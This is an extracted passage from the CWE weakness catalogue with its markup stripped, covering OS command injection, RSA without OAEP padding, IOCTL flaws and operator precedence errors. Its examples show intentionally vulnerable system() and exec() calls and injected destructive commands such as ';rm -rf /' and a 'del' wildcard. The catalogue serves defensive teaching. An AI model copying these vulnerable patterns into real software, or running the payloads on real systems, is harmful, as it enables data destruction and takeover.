According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + If at all possible, use library calls rather than external processes to recreate the desired functionality. + + + Architecture and Design + Operation + Sandbox or Jail + + Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. + OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. + This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. + Be careful to avoid CWE-243 and other weaknesses related to jails. + + Limited + The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. + + + Architecture and Design + Attack Surface Reduction + For any data that will be used to generate a command to be executed, keep as much of that data out of external control as possible. For example, in web applications, this may require storing the data locally in the session's state instead of sending it out to the client in a hidden form field. + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + If the program to be executed allows arguments to be specified within an input file or from standard input, then consider using that mode to pass arguments instead of the command line. + + + Architecture and Design + Parameterization + + If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. + Some languages offer multiple functions that can be used to invoke commands. Where possible, identify any function that invokes a command shell using a single string, and replace it with a function that requires individual arguments. These functions typically perform appropriate quoting and filtering of arguments. For example, in C, the system() function accepts a string that contains the entire command to be executed, whereas execl(), execve(), and others require an array of strings, one for each argument. In Windows, CreateProcess() only accepts one command at a time. In Perl, if system() is provided with an array of arguments, then it will quote each of the arguments. + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When constructing OS command strings, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping. + Note that proper output encoding, escaping, and quoting is the most effective solution for preventing OS command injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent OS command injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, when invoking a mail program, you might need to allow the subject field to contain otherwise-dangerous inputs like ";" and ">" characters, which would need to be escaped or otherwise handled. In this case, stripping the character might reduce the risk of OS command injection, but it would produce incorrect behavior because the subject field would not be recorded as the user intended. This might seem to be a minor inconvenience, but it could be more important when the program relies on well-structured subject lines in order to pass messages to other components. + Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address. + + + + Architecture and Design + Enforcement by Conversion + When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. + + + Operation + Compilation or Build Hardening + Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184). + + + Operation + Environment Hardening + Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184). + + + Implementation + + Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. + If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. + Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. + In the context of OS Command Injection, error information passed back to the user might reveal whether an OS command is being executed and possibly which command is being used. + + + + Operation + Sandbox or Jail + Use runtime policy enforcement to create an allowlist of allowable commands, then prevent use of any command that does not appear in the allowlist. Technologies such as AppArmor are available to do this. + + + Operation + Firewall + Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth. + Moderate + An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization. + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + Operation + Implementation + Environment Hardening + When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. + + + + + This example code intends to take the name of a user and list the contents of that user's home directory. It is subject to the first variant of OS command injection. + + $userName = $_POST["user"];$command = 'ls -l /home/' . $userName;system($command); + + The $userName variable is not checked for malicious input. An attacker could set the $userName variable to an arbitrary OS command such as: + + ;rm -rf / + + Which would result in $command being: + + ls -l /home/;rm -rf / + + Since the semi-colon is a command separator in Unix, the OS would first execute the ls command, then the rm command, deleting the entire file system. + Also note that this example code is vulnerable to Path Traversal (CWE-22) and Untrusted Search Path (CWE-426) attacks. + + + The following simple program accepts a filename as a command line argument and displays the contents of the file back to the user. The program is installed setuid root because it is intended for use as a learning tool to allow system administrators in-training to inspect privileged system files without giving them the ability to modify them or damage the system. + + int main(int argc, char** argv) {char cmd[CMD_MAX] = "/usr/bin/cat ";strcat(cmd, argv[1]);system(cmd);} + + Because the program runs with root privileges, the call to system() also executes with root privileges. If a user specifies a standard filename, the call works as expected. However, if an attacker passes a string of the form ";rm -rf /", then the call to system() fails to execute cat due to a lack of arguments and then plows on to recursively delete the contents of the root partition. + Note that if argv[1] is a very long argument, then this issue might also be subject to a buffer overflow (CWE-120). + + + This example is a web application that intends to perform a DNS lookup of a user-supplied domain name. It is subject to the first variant of OS command injection. + + use CGI qw(:standard);$name = param('name');$nslookup = "/path/to/nslookup";print header;if (open($fh, "$nslookup $name|")) {while (<$fh>) {print escapeHTML($_);print "<br>\n";}close($fh);} + + Suppose an attacker provides a domain name like this: + + cwe.mitre.org%20%3B%20/bin/ls%20-l + + The "%3B" sequence decodes to the ";" character, and the %20 decodes to a space. The open() statement would then process a string like this: + + /path/to/nslookup cwe.mitre.org ; /bin/ls -l + + As a result, the attacker executes the "/bin/ls -l" command and gets a list of all the files in the program's working directory. The input could be replaced with much more dangerous commands, such as installing a malicious program on the server. + + + The example below reads the name of a shell script to execute from the system properties. It is subject to the second variant of OS command injection. + + String script = System.getProperty("SCRIPTNAME");if (script != null)System.exec(script); + + + If an attacker has control over this property, then they could modify the property to point to a dangerous program. + + + In the example below, a method is used to transform geographic coordinates from latitude and longitude format to UTM format. The method gets the input coordinates from a user through a HTTP request and executes a program local to the application server that performs the transformation. The method passes the latitude and longitude coordinates as a command-line option to the external program and will perform some processing to retrieve the results of the transformation and return the resulting UTM coordinates. + + public String coordinateTransformLatLonToUTM(String coordinates){ + String utmCoords = null;try { + String latlonCoords = coordinates;Runtime rt = Runtime.getRuntime();Process exec = rt.exec("cmd.exe /C latlon2utm.exe -" + latlonCoords); + // process results of coordinate transform + + + // ... + + + }catch(Exception e) {...}return utmCoords; + } + + However, the method does not verify that the contents of the coordinates input parameter includes only correctly-formatted latitude and longitude coordinates. If the input coordinates were not validated prior to the call to this method, a malicious user could execute another program local to the application server by appending '&' followed by the command for another program to the end of the coordinate string. The '&' instructs the Windows operating system to execute another program. + + + The following code is from an administrative web application designed to allow users to kick off a backup of an Oracle database using a batch-file wrapper around the rman utility and then run a cleanup.bat script to delete some temporary files. The script rmanDB.bat accepts a single command line parameter, which specifies what type of backup to perform. Because access to the database is restricted, the application runs the backup as a privileged user. + + ...String btype = request.getParameter("backuptype");String cmd = new String("cmd.exe /K \"c:\\util\\rmanDB.bat "+btype+"&&c:\\utl\\cleanup.bat\"") + System.Runtime.getRuntime().exec(cmd);... + + The problem here is that the program does not do any validation on the backuptype parameter read from the user. Typically the Runtime.exec() function will not execute multiple commands, but in this case the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec(). Once the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form "& del c:\\dbms\\*.*", then the application will execute this command along with the others specified by the program. Because of the nature of the application, it runs with the privileges necessary to interact with the database, which means whatever command the attacker injects will run with those privileges as well. + + + + + CVE-2020-10987 + OS command injection in Wi-Fi router, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-10987 + + + CVE-2020-10221 + Template functionality in network configuration management tool allows OS command injection, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-10221 + + + CVE-2020-9054 + Chain: improper input validation (CWE-20) in username parameter, leading to OS command injection (CWE-78), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-9054 + + + CVE-1999-0067 + Canonical example of OS command injection. CGI program does not neutralize "|" metacharacter when invoking a phonebook program. + https://www.cve.org/CVERecord?id=CVE-1999-0067 + + + CVE-2001-1246 + Language interpreter's mail function accepts another argument that is concatenated to a string used in a dangerous popen() call. Since there is no neutralization of this argument, both OS Command Injection (CWE-78) and Argument Injection (CWE-88) are possible. + https://www.cve.org/CVERecord?id=CVE-2001-1246 + + + CVE-2002-0061 + Web server allows command execution using "|" (pipe) character. + https://www.cve.org/CVERecord?id=CVE-2002-0061 + + + CVE-2003-0041 + FTP client does not filter "|" from filenames returned by the server, allowing for OS command injection. + https://www.cve.org/CVERecord?id=CVE-2003-0041 + + + CVE-2008-2575 + Shell metacharacters in a filename in a ZIP archive + https://www.cve.org/CVERecord?id=CVE-2008-2575 + + + CVE-2002-1898 + Shell metacharacters in a telnet:// link are not properly handled when the launching application processes the link. + https://www.cve.org/CVERecord?id=CVE-2002-1898 + + + CVE-2008-4304 + OS command injection through environment variable. + https://www.cve.org/CVERecord?id=CVE-2008-4304 + + + CVE-2008-4796 + OS command injection through https:// URLs + https://www.cve.org/CVERecord?id=CVE-2008-4796 + + + CVE-2007-3572 + Chain: incomplete denylist for OS command injection + https://www.cve.org/CVERecord?id=CVE-2007-3572 + + + CVE-2012-1988 + Product allows remote users to execute arbitrary commands by creating a file whose pathname contains shell metacharacters. + https://www.cve.org/CVERecord?id=CVE-2012-1988 + + + + Program Invocation + + + System Process + + + + OS Command Injection + + + A3 + Malicious File Execution + CWE More Specific + + + A6 + Injection Flaws + CWE More Specific + + + ENV03-C + Sanitize the environment when invoking external programs + + + ENV33-C + Do not call system() + CWE More Specific + + + STR02-C + Sanitize data passed to complex subsystems + + + 31 + OS Commanding + + + IDS07-J + Do not pass untrusted, unsanitized data to the Runtime.exec() method + + + SFP24 + Tainted input to command + + + ASCSM-CWE-78 + + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The "OS command injection" phrase carries different meanings to different people. For some people, it only refers to cases in which the attacker injects command separators into arguments for an application-controlled program that is being invoked. For some people, it refers to any type of attack that can allow the attacker to execute OS commands of their own choosing. This usage could include untrusted search path weaknesses (CWE-426) that cause the application to find and execute an attacker-controlled program. Further complicating the issue is the case when argument injection (CWE-88) allows alternate command-line switches or options to be inserted into the command line, such as an "-exec" switch whose purpose may be to execute the subsequent argument as a command (this -exec switch exists in the UNIX "find" command, for example). In this latter case, however, CWE-88 could be regarded as the primary weakness in a chain with CWE-78. + More investigation is needed into the distinction between the OS command injection variants, including the role with argument injection (CWE-88). Equivalent distinctions may exist in other injection-related problems such as SQL injection. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Research_Gaps, Terminology_Notes + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Name, Related_Attack_Patterns + + + KDM Analytics + 2009-07-17 + Improved the White_Box_Definition + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Name, White_Box_Definitions + + + CWE Content Team + MITRE + 2009-10-29 + updated Observed_Examples, References + + + CWE Content Team + MITRE + 2009-12-28 + updated Detection_Factors + + + CWE Content Team + MITRE + 2010-02-16 + updated Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Applicable_Platforms, Demonstrative_Examples, Terminology_Notes + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + OS Command Injection + Failure to Sanitize Data into an OS Command (aka 'OS Command Injection') + Failure to Preserve OS Command Structure (aka 'OS Command Injection') + Failure to Preserve OS Command Structure ('OS Command Injection') + Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection') + + + + The product uses the RSA algorithm but does not incorporate Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption. + Padding schemes are often used with cryptographic algorithms to make the plaintext less predictable and complicate attack efforts. The OAEP scheme is often used with RSA to nullify the impact of predictable common text. + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Medium + + + Access Control + Bypass Protection Mechanism + Without OAEP in RSA encryption, it will take less work for an attacker to decrypt the data or to infer patterns from the ciphertext. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + The example below attempts to build an RSA cipher. + + public Cipher getRSACipher() {Cipher rsa = null;try {rsa = javax.crypto.Cipher.getInstance("RSA/NONE/NoPadding");}catch (java.security.NoSuchAlgorithmException e) {log("this should never happen", e);}catch (javax.crypto.NoSuchPaddingException e) {log("this should never happen", e);}return rsa;} + + While the previous code successfully creates an RSA cipher, the cipher does not use padding. The following code creates an RSA cipher using OAEP. + + public Cipher getRSACipher() {Cipher rsa = null;try {rsa = javax.crypto.Cipher.getInstance("RSA/ECB/OAEPWithMD5AndMGF1Padding");}catch (java.security.NoSuchAlgorithmException e) {log("this should never happen", e);}catch (javax.crypto.NoSuchPaddingException e) {log("this should never happen", e);}return rsa;} + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry could probably have a new parent related to improper padding, however the role of padding in cryptographic algorithms can vary, such as hiding the length of the plaintext and providing additional random bits for the cipher. In general, cryptographic problems in CWE are not well organized and further research is needed. + + + + Fortify Software + 2009-07-08 + 1.5 + 2009-07-27 + Based on information from Fortify Software. + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product defines an IOCTL that uses METHOD_NEITHER for I/O, but it does not validate or incorrectly validates the addresses that are provided. + When an IOCTL uses the METHOD_NEITHER option for I/O control, it is the responsibility of the IOCTL to validate the addresses that have been supplied to it. If validation is missing or incorrect, attackers can supply arbitrary memory addresses, leading to code execution or a denial of service. + + + + + + + + + + + + Implementation + + + + + Integrity + Availability + Confidentiality + Modify Memory + Read Memory + Execute Unauthorized Code or Commands + DoS: Crash, Exit, or Restart + An attacker may be able to access memory that belongs to another process or user. If the attacker can control the contents that the IOCTL writes, it may lead to code execution at high privilege levels. At the least, a crash can occur. + + + + + Implementation + If METHOD_NEITHER is required for the IOCTL, then ensure that all user-space addresses are properly validated before they are first accessed. The ProbeForRead and ProbeForWrite routines are available for this task. Also properly protect and manage the user-supplied buffers, since the I/O Manager does not do this when METHOD_NEITHER is being used. See References. + + + Architecture and Design + If possible, avoid using METHOD_NEITHER in the IOCTL and select methods that effectively control the buffer size, such as METHOD_BUFFERED, METHOD_IN_DIRECT, or METHOD_OUT_DIRECT. + + + Architecture and Design + Implementation + If the IOCTL is part of a driver that is only intended to be accessed by trusted users, then use proper access control for the associated device or device namespace. See References. + + + + + CVE-2006-2373 + Driver for file-sharing and messaging protocol allows attackers to execute arbitrary code. + https://www.cve.org/CVERecord?id=CVE-2006-2373 + + + CVE-2009-0686 + Anti-virus product does not validate addresses, allowing attackers to gain SYSTEM privileges. + https://www.cve.org/CVERecord?id=CVE-2009-0686 + + + CVE-2009-0824 + DVD software allows attackers to cause a crash. + https://www.cve.org/CVERecord?id=CVE-2009-0824 + + + CVE-2008-5724 + Personal firewall allows attackers to gain SYSTEM privileges. + https://www.cve.org/CVERecord?id=CVE-2008-5724 + + + CVE-2007-5756 + chain: device driver for packet-capturing software allows access to an unintended IOCTL with resultant array index error. + https://www.cve.org/CVERecord?id=CVE-2007-5756 + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Because IOCTL functionality is typically performing low-level actions and closely interacts with the operating system, this weakness may only appear in code that is written in low-level languages. + + + While this type of issue has been known since 2006, it is probably still under-studied and under-reported. Most of the focus has been on high-profile software and security products, but other kinds of system software also use drivers. Since exploitation requires the development of custom code, it requires some skill to find this weakness. + Because exploitation typically requires local privileges, it might not be a priority for active attackers. However, remote exploitation may be possible for software such as device drivers. Even when remote vectors are not available, it may be useful as the final privilege-escalation step in multi-stage remote attacks against application-layer software, or as the primary attack by a local user on a multi-user system. + + + + + CWE Content Team + MITRE + 2009-07-15 + 1.5 + 2009-07-27 + + + CWE Content Team + MITRE + 2009-12-28 + updated Common_Consequences, Potential_Mitigations, References, Time_of_Introduction + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Likelihood_of_Exploit, References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product implements an IOCTL with functionality that should be restricted, but it does not properly enforce access control for the IOCTL. + + When an IOCTL contains privileged functionality and is exposed unnecessarily, attackers may be able to access this functionality by invoking the IOCTL. Even if the functionality is benign, if the programmer has assumed that the IOCTL would only be accessed by a trusted process, there may be little or no validation of the incoming data, exposing weaknesses that would never be reachable if the attacker cannot call the IOCTL directly. + The implementations of IOCTLs will differ between operating system types and versions, so the methods of attack and prevention may vary widely. + + + + + + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Availability + Confidentiality + Attackers can invoke any functionality that the IOCTL offers. Depending on the functionality, the consequences may include code execution, denial-of-service, and theft of data. + + + + + Architecture and Design + In Windows environments, use proper access control for the associated device or device namespace. See References. + + + + + CVE-2009-2208 + Operating system does not enforce permissions on an IOCTL that can be used to modify network settings. + https://www.cve.org/CVERecord?id=CVE-2009-2208 + + + CVE-2008-3831 + Device driver does not restrict ioctl calls to its direct rendering manager. + https://www.cve.org/CVERecord?id=CVE-2008-3831 + + + CVE-2008-3525 + ioctl does not check for a required capability before processing certain requests. + https://www.cve.org/CVERecord?id=CVE-2008-3525 + + + CVE-2008-0322 + Chain: insecure device permissions allows access to an IOCTL, allowing arbitrary memory to be overwritten. + https://www.cve.org/CVERecord?id=CVE-2008-0322 + + + CVE-2007-4277 + Chain: anti-virus product uses weak permissions for a device, leading to resultant buffer overflow in an exposed IOCTL. + https://www.cve.org/CVERecord?id=CVE-2007-4277 + + + CVE-2007-1400 + Chain: sandbox allows opening of a TTY device, enabling shell commands through an exposed ioctl. + https://www.cve.org/CVERecord?id=CVE-2007-1400 + + + CVE-2006-4926 + Anti-virus product uses insecure security descriptor for a device driver, allowing access to a privileged IOCTL. + https://www.cve.org/CVERecord?id=CVE-2006-4926 + + + CVE-1999-0728 + Unauthorized user can disable keyboard or mouse by directly invoking a privileged IOCTL. + https://www.cve.org/CVERecord?id=CVE-1999-0728 + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This can be primary to many other weaknesses when the programmer assumes that the IOCTL can only be accessed by trusted parties. For example, a program or driver might not validate incoming addresses in METHOD_NEITHER IOCTLs in Windows environments (CWE-781), which could allow buffer overflow and similar attacks to take place, even when the attacker never should have been able to access the IOCTL at all. + + Because IOCTL functionality is typically performing low-level actions and closely interacts with the operating system, this weakness may only appear in code that is written in low-level languages. + + + + + CWE Content Team + MITRE + 2009-07-15 + 1.5 + 2009-07-27 + + + CWE Content Team + MITRE + 2009-12-28 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses an expression in which operator precedence causes incorrect logic to be used. + While often just a bug, operator precedence logic errors can have serious consequences if they are used in security-critical code, such as making an authentication decision. + + + + + + + + + + + Implementation + Logic errors related to operator precedence may cause problems even during normal operation, so they are probably discovered quickly during the testing phase. If testing is incomplete or there is a strong reliance on manual review of the code, then these errors may not be discovered before the software is deployed. + + + Low + + + Confidentiality + Integrity + Availability + Varies by Context + Unexpected State + The consequences will vary based on the context surrounding the incorrect precedence. In a security decision, integrity or confidentiality are the most likely results. Otherwise, a crash may occur due to the software reaching an unexpected state. + + + + + Implementation + Regularly wrap sub-expressions in parentheses, especially in security-critical code. + + + + + In the following example, the method validateUser makes a call to another method to authenticate a username and password for a user and returns a success or failure code. + + #define FAIL 0#define SUCCESS 1 + ... + int validateUser(char *username, char *password) { + + int isUser = FAIL; + + // call method to authenticate username and password + + + // if authentication fails then return failure otherwise return success + if (isUser = AuthenticateUser(username, password) == FAIL) {return isUser;}else {isUser = SUCCESS;} + return isUser; + } + + However, the method that authenticates the username and password is called within an if statement with incorrect operator precedence logic. Because the comparison operator "==" has a higher precedence than the assignment operator "=", the comparison operator will be evaluated first and if the method returns FAIL then the comparison will be true, the return variable will be set to true and SUCCESS will be returned. This operator precedence logic error can be easily resolved by properly using parentheses within the expression of the if statement, as shown below. + + ... + if ((isUser = AuthenticateUser(username, password)) == FAIL) { + ... + + + + In this example, the method calculates the return on investment for an accounting/financial application. The return on investment is calculated by subtracting the initial investment costs from the current value and then dividing by the initial investment costs. + + public double calculateReturnOnInvestment(double currentValue, double initialInvestment) { + + double returnROI = 0.0; + + // calculate return on investment + returnROI = currentValue - initialInvestment / initialInvestment; + return returnROI; + } + + However, the return on investment calculation will not produce correct results because of the incorrect operator precedence logic in the equation. The divide operator has a higher precedence than the minus operator, therefore the equation will divide the initial investment costs by the initial investment costs which will only subtract one from the current value. Again this operator precedence logic error can be resolved by the correct use of parentheses within the equation, as shown below. + + ... + returnROI = (currentValue - initialInvestment) / initialInvestment; + ... + + Note that the initialInvestment variable in this example should be validated to 